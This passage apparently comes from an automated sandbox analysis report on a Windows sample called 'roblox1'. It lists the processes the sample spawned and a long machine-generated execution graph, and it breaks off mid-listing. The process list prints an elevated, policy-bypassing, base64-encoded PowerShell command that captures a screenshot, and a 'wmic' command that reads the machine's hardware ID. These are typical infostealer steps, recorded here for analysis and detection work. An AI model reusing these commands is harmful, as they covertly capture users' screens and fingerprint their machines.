                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                                                  Start time:09:08:56
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA
                                                                                                                                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                                                                  Start time:09:08:58
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:59
                                                                                                                                                                                                                                  Start time:09:09:01
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:60
                                                                                                                                                                                                                                  Start time:09:09:01
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                  Imagebase:0x980000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00007FF7AC5F1125 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1971861789.00007FF7AC5F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AC5F0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1971831715.00007FF7AC5F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1971901510.00007FF7AC60D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1971928821.00007FF7AC60E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1971955809.00007FF7AC612000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1971999843.00007FF7AC614000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1971999843.00007FF7AC630000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1971999843.00007FF7AC633000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1971999843.00007FF7AC638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1972124086.00007FF7AC63B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1972124086.00007FF7AD03B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7ac5f0000_roblox1.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0223baef4331ed4ed1a8c7beb13d382d990cc06f23f219c2883b323266e75979
                                                                                                                                                                                                                                    • Instruction ID: 2c3a519e101296b28af294e22c6f8ae84654713980c6d097afeb44457a54afc9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0223baef4331ed4ed1a8c7beb13d382d990cc06f23f219c2883b323266e75979
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EC08C35A09202E8F300BF24C8023A873346B00B00F958030D9080BBA2CB3CE0024A60

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:0.1%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:5.8%
                                                                                                                                                                                                                                    Total number of Nodes:1164
                                                                                                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                                                                                                    execution_graph 8241 7ffbaaf273a0 PyTuple_Size PyTuple_GetSlice 8242 7ffbaaf273ea PyObject_Call 8241->8242 8243 7ffbaaf273da 8241->8243 8244 7ffbaaf2740b 8242->8244 8245 7ffbaaf27402 _Py_Dealloc 8242->8245 8245->8244 12030 7ffbaaf27420 12031 7ffbaaf2744c 12030->12031 12032 7ffbaaf27566 PyTuple_New 12030->12032 12033 7ffbaaf2746b PyObject_GetAttr 12031->12033 12040 7ffbaaf27466 12031->12040 12034 7ffbaaf275a1 12032->12034 12035 7ffbaaf27579 12032->12035 12033->12040 12035->12034 12036 7ffbaaf27598 _Py_Dealloc 12035->12036 12036->12034 12037 7ffbaaf27562 12037->12032 12038 7ffbaaf27515 12038->12032 12041 7ffbaaf27531 PyCMethod_New 12038->12041 12039 7ffbaaf27508 PyType_IsSubtype 12039->12032 12039->12038 12040->12034 12040->12037 12040->12038 12040->12039 12041->12034 12042 7ffbaaf27553 12041->12042 12042->12037 12043 7ffbaaf27559 _Py_Dealloc 12042->12043 12043->12037 12044 7ffbaaf25c20 12045 7ffbaaf25c30 12044->12045 12046 7ffbaaf25c33 PyObject_GetAttr 12044->12046 12045->12046 8406 7ffbaaf12ba0 _PyThreadState_UncheckedGet 8407 7ffbaaf12c12 8406->8407 8408 7ffbaaf12ea4 8407->8408 8409 7ffbaaf12c69 8407->8409 8415 7ffbaaf12d44 8408->8415 8416 7ffbaaf13109 8408->8416 8410 7ffbaaf12c80 8409->8410 8411 7ffbaaf12ce1 _PyDict_GetItem_KnownHash 8409->8411 8414 7ffbaaf12c8c 8410->8414 8476 7ffbaaf25c40 8410->8476 8412 7ffbaaf12d21 PyErr_Occurred 8411->8412 8411->8414 8412->8414 8414->8415 8420 7ffbaaf12d54 PyLong_FromSize_t 8414->8420 8424 7ffbaaf12ef3 8415->8424 8429 7ffbaaf12eea _Py_Dealloc 8415->8429 8418 7ffbaaf1310f _Py_Dealloc 8416->8418 8419 7ffbaaf13118 8416->8419 8418->8419 8422 7ffbaaf1311e _Py_Dealloc 8419->8422 8423 7ffbaaf13102 8419->8423 8420->8415 8425 7ffbaaf12d7b PyLong_FromSize_t 8420->8425 8421 7ffbaaf12cba PyErr_Occurred 8421->8414 8428 7ffbaaf12cc5 PyErr_Format 8421->8428 8422->8423 8512 7ffbaaf27830 8423->8512 8426 7ffbaaf12f0c 8424->8426 8430 7ffbaaf12f03 _Py_Dealloc 8424->8430 8425->8415 8427 7ffbaaf12d9e 8425->8427 8431 7ffbaaf12f2d 8426->8431 8433 7ffbaaf12f24 _Py_Dealloc 8426->8433 8435 7ffbaaf12dca _Py_Dealloc 8427->8435 8439 7ffbaaf12dd3 8427->8439 8428->8414 8429->8424 8430->8426 8436 7ffbaaf12f39 _Py_Dealloc 8431->8436 8443 7ffbaaf12f42 8431->8443 8433->8431 8434 7ffbaaf1318f 8435->8439 8436->8443 8437 7ffbaaf13189 _Py_Dealloc 8437->8434 8438 7ffbaaf12e2c 8444 7ffbaaf12e3c 8438->8444 8445 7ffbaaf12e33 _Py_Dealloc 8438->8445 8439->8438 8442 7ffbaaf12e23 _Py_Dealloc 8439->8442 8440 7ffbaaf12fb9 8441 7ffbaaf13015 8440->8441 8448 7ffbaaf1300f _Py_Dealloc 8440->8448 8449 7ffbaaf1302a 8441->8449 8454 7ffbaaf13021 _Py_Dealloc 8441->8454 8442->8438 8443->8440 8450 7ffbaaf12f75 8443->8450 8491 7ffbaaf2a3d0 8443->8491 8451 7ffbaaf12e51 8444->8451 8452 7ffbaaf12e48 _Py_Dealloc 8444->8452 8445->8444 8448->8441 8455 7ffbaaf1303e 8449->8455 8456 7ffbaaf13035 _Py_Dealloc 8449->8456 8450->8440 8496 7ffbaaf26830 PyErr_NormalizeException 8450->8496 8451->8415 8458 7ffbaaf12e6c _Py_Dealloc 8451->8458 8459 7ffbaaf12e75 8451->8459 8452->8451 8454->8449 8457 7ffbaaf13052 8455->8457 8461 7ffbaaf13049 _Py_Dealloc 8455->8461 8456->8455 8462 7ffbaaf13066 8457->8462 8467 7ffbaaf1305d _Py_Dealloc 8457->8467 8458->8459 8459->8415 8471 7ffbaaf12e8b _Py_Dealloc 8459->8471 8460 7ffbaaf1309a 8463 7ffbaaf130bb 8460->8463 8464 7ffbaaf130b5 _Py_Dealloc 8460->8464 8461->8457 8468 7ffbaaf1307a 8462->8468 8472 7ffbaaf13071 _Py_Dealloc 8462->8472 8465 7ffbaaf130d1 8463->8465 8466 7ffbaaf130c8 _Py_Dealloc 8463->8466 8464->8463 8469 7ffbaaf130dc _Py_Dealloc 8465->8469 8470 7ffbaaf130e2 8465->8470 8466->8465 8467->8462 8468->8434 8468->8437 8469->8470 8473 7ffbaaf130ed _Py_Dealloc 8470->8473 8474 7ffbaaf130f3 8470->8474 8471->8415 8472->8468 8473->8474 8474->8423 8475 7ffbaaf130f9 _Py_Dealloc 8474->8475 8475->8423 8477 7ffbaaf25c6c 8476->8477 8478 7ffbaaf25c58 _PyObject_GenericGetAttrWithDict 8476->8478 8479 7ffbaaf25c7b PyObject_GetAttr 8477->8479 8480 7ffbaaf25c76 8477->8480 8478->8477 8479->8480 8481 7ffbaaf25c8d _PyThreadState_UncheckedGet 8480->8481 8482 7ffbaaf12cae 8480->8482 8483 7ffbaaf25cae 8481->8483 8486 7ffbaaf25cc8 8481->8486 8482->8414 8482->8421 8483->8482 8483->8486 8489 7ffbaaf2a3d0 PyErr_GivenExceptionMatches 8483->8489 8484 7ffbaaf25d0d 8485 7ffbaaf25d21 8484->8485 8488 7ffbaaf25d18 _Py_Dealloc 8484->8488 8485->8482 8490 7ffbaaf25d31 _Py_Dealloc 8485->8490 8486->8482 8486->8484 8487 7ffbaaf25d07 _Py_Dealloc 8486->8487 8487->8484 8488->8485 8489->8486 8490->8482 8492 7ffbaaf2a3d9 8491->8492 8494 7ffbaaf2a3e3 8491->8494 8492->8450 8493 7ffbaaf2a5a2 PyErr_GivenExceptionMatches 8494->8493 8495 7ffbaaf2a424 8494->8495 8495->8450 8497 7ffbaaf26891 8496->8497 8498 7ffbaaf26966 8496->8498 8499 7ffbaaf2689b PyException_SetTraceback 8497->8499 8504 7ffbaaf268b1 8497->8504 8500 7ffbaaf2697f _Py_Dealloc 8498->8500 8502 7ffbaaf26985 8498->8502 8499->8498 8499->8504 8500->8502 8501 7ffbaaf2699b 8503 7ffbaaf12fb1 8501->8503 8507 7ffbaaf269ab _Py_Dealloc 8501->8507 8502->8501 8505 7ffbaaf26995 _Py_Dealloc 8502->8505 8503->8440 8503->8460 8506 7ffbaaf2693a 8504->8506 8508 7ffbaaf26931 _Py_Dealloc 8504->8508 8505->8501 8509 7ffbaaf2694e 8506->8509 8510 7ffbaaf26945 _Py_Dealloc 8506->8510 8507->8503 8508->8506 8509->8503 8511 7ffbaaf26959 _Py_Dealloc 8509->8511 8510->8509 8511->8503 8513 7ffbaaf2785c 8512->8513 8514 7ffbaaf27868 8512->8514 8513->8514 8515 7ffbaaf27862 _Py_Dealloc 8513->8515 8516 7ffbaaf27873 _Py_Dealloc 8514->8516 8518 7ffbaaf2787c 8514->8518 8515->8514 8516->8518 8517 7ffbaaf27890 8517->8468 8518->8517 8519 7ffbaaf27887 _Py_Dealloc 8518->8519 8519->8517 8520 7ffbaaf17fa0 8521 7ffbaaf17fd3 8520->8521 8522 7ffbaaf17fc7 8520->8522 8524 7ffbaaf17ffd 8521->8524 8525 7ffbaaf17ff7 _Py_Dealloc 8521->8525 8522->8521 8523 7ffbaaf17fcd _Py_Dealloc 8522->8523 8523->8521 8526 7ffbaaf18027 8524->8526 8527 7ffbaaf18021 _Py_Dealloc 8524->8527 8525->8524 8528 7ffbaaf18051 8526->8528 8529 7ffbaaf1804b _Py_Dealloc 8526->8529 8527->8526 8530 7ffbaaf1807b 8528->8530 8531 7ffbaaf18075 _Py_Dealloc 8528->8531 8529->8528 8532 7ffbaaf180a5 8530->8532 8533 7ffbaaf1809f _Py_Dealloc 8530->8533 8531->8530 8534 7ffbaaf180cf 8532->8534 8535 7ffbaaf180c9 _Py_Dealloc 8532->8535 8533->8532 8536 7ffbaaf180f9 8534->8536 8537 7ffbaaf180f3 _Py_Dealloc 8534->8537 8535->8534 8537->8536 8538 7ffbaaf2b3a0 PyArg_UnpackTuple 8539 7ffbaaf2b3f4 8538->8539 8540 7ffbaaf2bba0 8541 7ffbaaf2bbe1 PyOS_snprintf PyErr_WarnEx 8540->8541 8542 7ffbaaf2bbc7 8540->8542 8543 7ffbaaf2bc54 8541->8543 12047 7ffbaaf28820 12048 7ffbaaf2884e 12047->12048 12049 7ffbaaf28a18 12047->12049 12048->12049 12050 7ffbaaf28860 PyMem_Malloc 12048->12050 12051 7ffbaaf2888b PyTuple_New 12050->12051 12052 7ffbaaf28880 PyErr_NoMemory 12050->12052 12055 7ffbaaf288c2 PyMem_Free 12051->12055 12056 7ffbaaf288d0 PyDict_Next 12051->12056 12054 7ffbaaf289fe 12052->12054 12055->12054 12057 7ffbaaf28901 12056->12057 12058 7ffbaaf289a6 12056->12058 12059 7ffbaaf28920 PyDict_Next 12057->12059 12062 7ffbaaf289c7 _Py_Dealloc 12058->12062 12065 7ffbaaf289d0 12058->12065 12059->12059 12060 7ffbaaf28978 12059->12060 12060->12058 12061 7ffbaaf2898b PyErr_SetString 12060->12061 12061->12058 12062->12065 12063 7ffbaaf289ed PyMem_Free 12063->12054 12064 7ffbaaf289df _Py_Dealloc 12064->12065 12065->12063 12065->12064 8704 7ffbaaf1f3a5 8705 7ffbaaf235f4 8704->8705 8706 7ffbaaf23603 8705->8706 8707 7ffbaaf235fa _Py_Dealloc 8705->8707 8708 7ffbaaf24247 8706->8708 8710 7ffbaaf2423e _Py_Dealloc 8706->8710 8707->8706 8709 7ffbaaf2425c 8708->8709 8711 7ffbaaf24253 _Py_Dealloc 8708->8711 8712 7ffbaaf24271 8709->8712 8713 7ffbaaf24268 _Py_Dealloc 8709->8713 8710->8708 8711->8709 8714 7ffbaaf2428d 8712->8714 8716 7ffbaaf24284 _Py_Dealloc 8712->8716 8713->8712 8715 7ffbaaf242a9 8714->8715 8717 7ffbaaf242a0 _Py_Dealloc 8714->8717 8718 7ffbaaf242c5 8715->8718 8719 7ffbaaf242bc _Py_Dealloc 8715->8719 8716->8714 8717->8715 8720 7ffbaaf242e1 8718->8720 8721 7ffbaaf242d8 _Py_Dealloc 8718->8721 8719->8718 8722 7ffbaaf242fa 8720->8722 8723 7ffbaaf242f1 _Py_Dealloc 8720->8723 8721->8720 8724 7ffbaaf24313 8722->8724 8725 7ffbaaf2430a _Py_Dealloc 8722->8725 8723->8722 8726 7ffbaaf2432c 8724->8726 8727 7ffbaaf24323 _Py_Dealloc 8724->8727 8725->8724 8728 7ffbaaf24345 8726->8728 8729 7ffbaaf2433c _Py_Dealloc 8726->8729 8727->8726 8730 7ffbaaf2435e 8728->8730 8731 7ffbaaf24355 _Py_Dealloc 8728->8731 8729->8728 8732 7ffbaaf24377 8730->8732 8733 7ffbaaf2436e _Py_Dealloc 8730->8733 8731->8730 8734 7ffbaaf24390 8732->8734 8735 7ffbaaf24387 _Py_Dealloc 8732->8735 8733->8732 8736 7ffbaaf243a9 8734->8736 8738 7ffbaaf243a0 _Py_Dealloc 8734->8738 8735->8734 8737 7ffbaaf243c5 8736->8737 8739 7ffbaaf243bc _Py_Dealloc 8736->8739 8740 7ffbaaf243e1 8737->8740 8741 7ffbaaf243d8 _Py_Dealloc 8737->8741 8738->8736 8739->8737 8742 7ffbaaf243fd 8740->8742 8743 7ffbaaf243f4 _Py_Dealloc 8740->8743 8741->8740 8744 7ffbaaf24419 8742->8744 8745 7ffbaaf24410 _Py_Dealloc 8742->8745 8743->8742 8746 7ffbaaf24435 8744->8746 8748 7ffbaaf2442c _Py_Dealloc 8744->8748 8745->8744 8747 7ffbaaf24451 8746->8747 8749 7ffbaaf24448 _Py_Dealloc 8746->8749 8750 7ffbaaf2446d 8747->8750 8751 7ffbaaf24464 _Py_Dealloc 8747->8751 8748->8746 8749->8747 8752 7ffbaaf24489 8750->8752 8753 7ffbaaf24480 _Py_Dealloc 8750->8753 8751->8750 8754 7ffbaaf244a5 8752->8754 8755 7ffbaaf2449c _Py_Dealloc 8752->8755 8753->8752 8756 7ffbaaf244c1 8754->8756 8757 7ffbaaf244b8 _Py_Dealloc 8754->8757 8755->8754 8758 7ffbaaf244dd 8756->8758 8759 7ffbaaf244d4 _Py_Dealloc 8756->8759 8757->8756 8760 7ffbaaf244f9 8758->8760 8761 7ffbaaf244f0 _Py_Dealloc 8758->8761 8759->8758 8762 7ffbaaf24515 8760->8762 8763 7ffbaaf2450c _Py_Dealloc 8760->8763 8761->8760 8764 7ffbaaf24531 8762->8764 8765 7ffbaaf24528 _Py_Dealloc 8762->8765 8763->8762 8766 7ffbaaf2454d 8764->8766 8767 7ffbaaf24544 _Py_Dealloc 8764->8767 8765->8764 8768 7ffbaaf24569 8766->8768 8770 7ffbaaf24560 _Py_Dealloc 8766->8770 8767->8766 8769 7ffbaaf24585 8768->8769 8771 7ffbaaf2457c _Py_Dealloc 8768->8771 8772 7ffbaaf245a1 8769->8772 8773 7ffbaaf24598 _Py_Dealloc 8769->8773 8770->8768 8771->8769 8774 7ffbaaf245bd 8772->8774 8775 7ffbaaf245b4 _Py_Dealloc 8772->8775 8773->8772 8776 7ffbaaf245d9 8774->8776 8777 7ffbaaf245d0 _Py_Dealloc 8774->8777 8775->8774 8778 7ffbaaf245f5 8776->8778 8780 7ffbaaf245ec _Py_Dealloc 8776->8780 8777->8776 8779 7ffbaaf24611 8778->8779 8781 7ffbaaf24608 _Py_Dealloc 8778->8781 8782 7ffbaaf2462d 8779->8782 8783 7ffbaaf24624 _Py_Dealloc 8779->8783 8780->8778 8781->8779 8784 7ffbaaf24649 8782->8784 8785 7ffbaaf24640 _Py_Dealloc 8782->8785 8783->8782 8786 7ffbaaf24665 8784->8786 8787 7ffbaaf2465c _Py_Dealloc 8784->8787 8785->8784 8788 7ffbaaf24681 8786->8788 8789 7ffbaaf24678 _Py_Dealloc 8786->8789 8787->8786 8790 7ffbaaf2469d 8788->8790 8791 7ffbaaf24694 _Py_Dealloc 8788->8791 8789->8788 8792 7ffbaaf246b9 8790->8792 8793 7ffbaaf246b0 _Py_Dealloc 8790->8793 8791->8790 8794 7ffbaaf246d5 8792->8794 8795 7ffbaaf246cc _Py_Dealloc 8792->8795 8793->8792 8796 7ffbaaf246f1 8794->8796 8797 7ffbaaf246e8 _Py_Dealloc 8794->8797 8795->8794 8798 7ffbaaf2470d 8796->8798 8799 7ffbaaf24704 _Py_Dealloc 8796->8799 8797->8796 8800 7ffbaaf24729 8798->8800 8802 7ffbaaf24720 _Py_Dealloc 8798->8802 8799->8798 8801 7ffbaaf24745 8800->8801 8803 7ffbaaf2473c _Py_Dealloc 8800->8803 8804 7ffbaaf24761 8801->8804 8805 7ffbaaf24758 _Py_Dealloc 8801->8805 8802->8800 8803->8801 8806 7ffbaaf2477d 8804->8806 8807 7ffbaaf24774 _Py_Dealloc 8804->8807 8805->8804 8808 7ffbaaf24799 8806->8808 8809 7ffbaaf24790 _Py_Dealloc 8806->8809 8807->8806 8810 7ffbaaf247b5 8808->8810 8812 7ffbaaf247ac _Py_Dealloc 8808->8812 8809->8808 8811 7ffbaaf247d1 8810->8811 8813 7ffbaaf247c8 _Py_Dealloc 8810->8813 8814 7ffbaaf247ed 8811->8814 8815 7ffbaaf247e4 _Py_Dealloc 8811->8815 8812->8810 8813->8811 8816 7ffbaaf24809 8814->8816 8817 7ffbaaf24800 _Py_Dealloc 8814->8817 8815->8814 8818 7ffbaaf24825 8816->8818 8819 7ffbaaf2481c _Py_Dealloc 8816->8819 8817->8816 8820 7ffbaaf24841 8818->8820 8821 7ffbaaf24838 _Py_Dealloc 8818->8821 8819->8818 8822 7ffbaaf2485d 8820->8822 8823 7ffbaaf24854 _Py_Dealloc 8820->8823 8821->8820 8824 7ffbaaf24879 8822->8824 8825 7ffbaaf24870 _Py_Dealloc 8822->8825 8823->8822 8826 7ffbaaf24895 8824->8826 8827 7ffbaaf2488c _Py_Dealloc 8824->8827 8825->8824 8828 7ffbaaf248b1 8826->8828 8829 7ffbaaf248a8 _Py_Dealloc 8826->8829 8827->8826 8830 7ffbaaf248cd 8828->8830 8831 7ffbaaf248c4 _Py_Dealloc 8828->8831 8829->8828 8832 7ffbaaf248e9 8830->8832 8834 7ffbaaf248e0 _Py_Dealloc 8830->8834 8831->8830 8833 7ffbaaf24905 8832->8833 8835 7ffbaaf248fc _Py_Dealloc 8832->8835 8836 7ffbaaf24921 8833->8836 8837 7ffbaaf24918 _Py_Dealloc 8833->8837 8834->8832 8835->8833 8838 7ffbaaf2493d 8836->8838 8839 7ffbaaf24934 _Py_Dealloc 8836->8839 8837->8836 8840 7ffbaaf24959 8838->8840 8841 7ffbaaf24950 _Py_Dealloc 8838->8841 8839->8838 8842 7ffbaaf24975 8840->8842 8844 7ffbaaf2496c _Py_Dealloc 8840->8844 8841->8840 8843 7ffbaaf24991 8842->8843 8845 7ffbaaf24988 _Py_Dealloc 8842->8845 8846 7ffbaaf249ad 8843->8846 8847 7ffbaaf249a4 _Py_Dealloc 8843->8847 8844->8842 8845->8843 8848 7ffbaaf249c9 8846->8848 8849 7ffbaaf249c0 _Py_Dealloc 8846->8849 8847->8846 8850 7ffbaaf249e5 8848->8850 8851 7ffbaaf249dc _Py_Dealloc 8848->8851 8849->8848 8852 7ffbaaf24a01 8850->8852 8853 7ffbaaf249f8 _Py_Dealloc 8850->8853 8851->8850 8854 7ffbaaf24a1d 8852->8854 8855 7ffbaaf24a14 _Py_Dealloc 8852->8855 8853->8852 8856 7ffbaaf24a39 8854->8856 8857 7ffbaaf24a30 _Py_Dealloc 8854->8857 8855->8854 8858 7ffbaaf24a55 8856->8858 8859 7ffbaaf24a4c _Py_Dealloc 8856->8859 8857->8856 8860 7ffbaaf258cb _Py_Dealloc 8858->8860 8861 7ffbaaf1f2e9 8858->8861 8859->8858 8860->8861 8862 7ffbaaf25953 8861->8862 8863 7ffbaaf1f348 _Py_Dealloc 8861->8863 8863->8862 12066 7ffbaaf11c27 12067 7ffbaaf11cdc 12066->12067 12068 7ffbaaf11cfd _Py_Dealloc 12067->12068 12069 7ffbaaf11d06 12067->12069 12083 7ffbaaf11ce1 12067->12083 12068->12069 12070 7ffbaaf11d1d 12069->12070 12071 7ffbaaf11d7e _PyDict_GetItem_KnownHash 12069->12071 12073 7ffbaaf25c40 7 API calls 12070->12073 12074 7ffbaaf11d29 12070->12074 12072 7ffbaaf11dbe PyErr_Occurred 12071->12072 12071->12074 12072->12074 12075 7ffbaaf11d4b 12073->12075 12076 7ffbaaf11e1b PyObject_IsTrue 12074->12076 12077 7ffbaaf11e26 12074->12077 12074->12083 12075->12074 12078 7ffbaaf11d57 PyErr_Occurred 12075->12078 12076->12077 12079 7ffbaaf11e6d 12077->12079 12080 7ffbaaf11e33 12077->12080 12078->12074 12081 7ffbaaf11d62 PyErr_Format 12078->12081 12079->12083 12084 7ffbaaf11e72 _Py_Dealloc 12079->12084 12082 7ffbaaf11e49 _Py_Dealloc 12080->12082 12080->12083 12081->12074 12082->12083 12084->12083 9187 7ffbaaf25bb0 9188 7ffbaaf25be6 9187->9188 9189 7ffbaaf25bd7 9187->9189 9191 7ffbaaf25bfa 9188->9191 9192 7ffbaaf25bf1 _Py_Dealloc 9188->9192 9189->9188 9190 7ffbaaf25bdd _Py_Dealloc 9189->9190 9190->9188 9193 7ffbaaf25c0e 9191->9193 9194 7ffbaaf25c05 _Py_Dealloc 9191->9194 9192->9191 9194->9193 12085 7ffbaaf1fc30 12086 7ffbaaf24231 12085->12086 12087 7ffbaaf2423e _Py_Dealloc 12086->12087 12088 7ffbaaf24247 12086->12088 12087->12088 12089 7ffbaaf2425c 12088->12089 12090 7ffbaaf24253 _Py_Dealloc 12088->12090 12091 7ffbaaf24271 12089->12091 12092 7ffbaaf24268 _Py_Dealloc 12089->12092 12090->12089 12093 7ffbaaf2428d 12091->12093 12095 7ffbaaf24284 _Py_Dealloc 12091->12095 12092->12091 12094 7ffbaaf242a9 12093->12094 12096 7ffbaaf242a0 _Py_Dealloc 12093->12096 12097 7ffbaaf242c5 12094->12097 12098 7ffbaaf242bc _Py_Dealloc 12094->12098 12095->12093 12096->12094 12099 7ffbaaf242e1 12097->12099 12100 7ffbaaf242d8 _Py_Dealloc 12097->12100 12098->12097 12101 7ffbaaf242fa 12099->12101 12102 7ffbaaf242f1 _Py_Dealloc 12099->12102 12100->12099 12103 